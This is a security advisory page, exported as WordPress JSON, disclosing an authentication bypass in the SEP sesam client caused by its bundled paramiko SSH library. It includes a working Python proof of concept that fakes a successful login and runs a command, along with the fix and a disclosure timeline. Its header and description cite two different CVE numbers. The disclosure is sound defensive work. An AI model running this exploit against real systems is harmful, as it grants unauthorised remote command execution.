{"id":16571,"date":"2021-07-08T10:17:02","date_gmt":"2021-07-08T08:17:02","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2018-0025\/"},"modified":"2021-07-19T14:09:04","modified_gmt":"2021-07-19T12:09:04","slug":"usd-2018-0025","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2018-0025\/","title":{"rendered":"usd-2018-0025"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<h1 class=\"h-custom-headline usd-small-letters h2\"><span>usd-2018-0025 | SEP sesam\/4.4.3.62<\/span><\/h1>\n<div class=\"x-text\"><\/div>\n<p><span><\/span><br \/><strong>Advisory ID<\/strong><span>: usd-2018-0025<\/span><br \/><strong>CVE Number<\/strong><span>: CVE-2018-7750<\/span><br \/><strong>Affected Product<\/strong><span>: SEP sesam<\/span><br \/><strong>Affected Version<\/strong><span>: 4.4.3.62<\/span><br \/><strong>Vulnerability Type<\/strong><span>: Authentication Bypass<\/span><br \/><strong>Security Risk<\/strong><span>: High<\/span><br \/><strong>Vendor URL<\/strong><span>: <\/span><a href=\"https:\/\/www.sep.de\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.sep.de\/<\/a><br \/><strong>Vendor Status<\/strong><span>: Fixed<\/span><\/p>\n<h3><\/h3>\n<h3><\/h3>\n<h3><\/h3>\n<h3>Description<\/h3>\n<div class=\"e11173-8 x-container max width\">\n<div class=\"e11173-9 x-column x-sm x-1-1\">\n<div class=\"x-text\">\n<p>SEP sesam uses an outdated version of paramiko (2.2.3) in sm_sshd, which has a known authentication bypass vulnerability (CVE-2018-1000805)<\/p>\n<h3><\/h3>\n<h3><\/h3>\n<h3>Proof of Concept (PoC)<\/h3>\n<p>Install the SEP sesam client. It opens an SSH server at port 11322. Run the following python script to exploit CVE-2018-1000805.<span style=\"font-size: 16px;\">\u00a0<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]#!\/usr\/bin\/env python<br \/>\nfrom paramiko.common import cMSG_USERAUTH_SUCCESS, cMSG_USERAUTH_INFO_RESPONSE<br \/>\nimport paramiko<\/p>\n<p>port = 11322<br \/>\nhostname = '[IP of client machine]'<br \/>\nusername = ''<br \/>\npassword = ''<\/p>\n<p>client = paramiko.SSHClient()<\/p>\n<p>#enable warning policy to allow connections to all servers<br \/>\nclient.set_missing_host_key_policy(paramiko.WarningPolicy())<\/p>\n<p>#overwrite auth method to skip the auth process<br \/>\nclient._auth = lambda *args, **kwargs: None<br \/>\nclient.connect(hostname, port, username, password)<\/p>\n<p>#craft MSG_USERAUTH_SUCCESS message<br \/>\nm = paramiko.Message()<br \/>\nm.add_byte(cMSG_USERAUTH_SUCCESS)<br \/>\nclient._transport._send_message(m)<\/p>\n<p>stdin, stdout, stderr = client.exec_command('whoami')<br \/>\nprint stdout.read()<\/p>\n<p>client.close()<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<div class=\"e16902-22 x-container max width\">\n<div class=\"e16902-23 x-column x-sm x-1-1\">\n<h3>Fix<\/h3>\n<p><span>Update paramiko to version 2.2.4<\/span><\/p>\n<h3><\/h3>\n<h3>Timeline<\/h3>\n<ul>\n<li>2018-09-11 notify info@sep.de<\/li>\n<li>2018-10-08 notify support@sep.de<\/li>\n<li>2018-12-07 verified that sesam 4.4.3-64 uses Paramiko 2.2.4<\/li>\n<li>2018-12-07 Security advisory released<\/li>\n<\/ul>\n<h3><\/h3>\n<h3>Credits<\/h3>\n<p><span>This security vulnerabilities were found by Daniel Hoffmann and Konstantin Samuel of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2018-0025 | SEP sesam\/4.4.3.62 Advisory ID: usd-2018-0025CVE Number: CVE-2018-7750Affected Product: SEP sesamAffected Version: 4.4.3.62Vulnerability Type: Authentication BypassSecurity Risk: HighVendor URL: https:\/\/www.sep.de\/Vendor Status: Fixed Description SEP sesam uses an outdated version of paramiko (2.2.3) in sm_sshd, which has a known authentication bypass vulnerability (CVE-2018-1000805) Proof of Concept (PoC) Install the SEP sesam client. It opens an [&hellip;]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16571","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16571","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16571"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16571\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16571"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}